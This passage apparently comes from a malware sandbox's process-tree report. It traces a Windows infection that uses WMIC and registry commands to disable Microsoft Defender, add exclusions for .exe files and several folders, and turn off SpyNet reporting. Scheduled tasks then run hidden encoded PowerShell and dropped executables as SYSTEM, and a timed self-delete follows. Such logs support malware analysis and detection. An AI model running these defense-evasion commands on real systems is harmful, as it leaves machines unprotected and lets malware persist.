C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:7588
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:6504
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:8040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:6804
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:5504
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"14⤵PID:7592
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&15⤵PID:5108
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3216⤵PID:7224
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6416⤵PID:7328
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"14⤵PID:8036
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&15⤵PID:8132
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3216⤵PID:6700
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6416⤵PID:8136
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBAQvvrnh" /SC once /ST 02:24:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="14⤵
- Creates scheduled task(s)
PID:6604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBAQvvrnh"14⤵PID:7908
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Executes dropped EXE
PID:4728
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBAQvvrnh"14⤵PID:5592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCQQUSYoXLKlZTQVFm" /SC once /ST 07:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\WcEadxDpHtEHjlL\KXOTaKB.exe\" 8e /site_id 216660 /S" /V1 /F14⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2228
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14as3yst.u01\gcleaner.exe /mixfive & exit10⤵PID:7100
-
C:\Users\Admin\AppData\Local\Temp\14as3yst.u01\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\14as3yst.u01\gcleaner.exe /mixfive11⤵
- Executes dropped EXE
PID:7424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ujgikaf.w3k\autosubplayer.exe /S & exit10⤵
- Suspicious use of SetWindowsHookEx
PID:7196
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05899db881f67fb29.exeSun05899db881f67fb29.exe6⤵
- Executes dropped EXE
PID:3288
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\48C2.exeC:\Users\Admin\AppData\Local\Temp\48C2.exe2⤵
- Executes dropped EXE
PID:4224
-
-
C:\Users\Admin\AppData\Local\Temp\57D6.exeC:\Users\Admin\AppData\Local\Temp\57D6.exe2⤵
- Executes dropped EXE
PID:6164 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
PID:4488
-
-
-
C:\Users\Admin\AppData\Local\Temp\CF78.exeC:\Users\Admin\AppData\Local\Temp\CF78.exe2⤵
- Loads dropped DLL
PID:7868 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CF78.exe"3⤵PID:1116
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:6232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B98.exeC:\Users\Admin\AppData\Local\Temp\B98.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8008
-
-
C:\Users\Admin\AppData\Local\Temp\202A.exeC:\Users\Admin\AppData\Local\Temp\202A.exe2⤵PID:4880
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
PID:2684 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4576
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2628
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2336
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1956
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:7848
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:6968
-
-
-
C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\WcEadxDpHtEHjlL\KXOTaKB.exeC:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\WcEadxDpHtEHjlL\KXOTaKB.exe 8e /site_id 216660 /S2⤵
- Drops file in System32 directory
PID:5772 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:7984
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:3304
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:7052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7496 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5092
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:1908
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:7072
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2640 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:6792
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:7504
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4284
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7568 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:4732
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6292
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5964 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5688
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6984 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6212
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵PID:6588
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵PID:6232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵PID:192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵PID:7728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵PID:856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:4912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵PID:6108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵PID:6604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵PID:4996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵PID:6288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:4740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
- Executes dropped EXE
PID:4172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵PID:5420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵PID:5256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵PID:7008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵PID:5104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵PID:7224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵PID:6520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵PID:896
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfNWPhScxyylC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfNWPhScxyylC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CaOqiYMiQPmU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CaOqiYMiQPmU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpvPjMDmaiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpvPjMDmaiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YSFbCTIaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YSFbCTIaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YwFgfawDzaFJYFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YwFgfawDzaFJYFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQxOXlbRXdqDUiOe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQxOXlbRXdqDUiOe\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4496 -
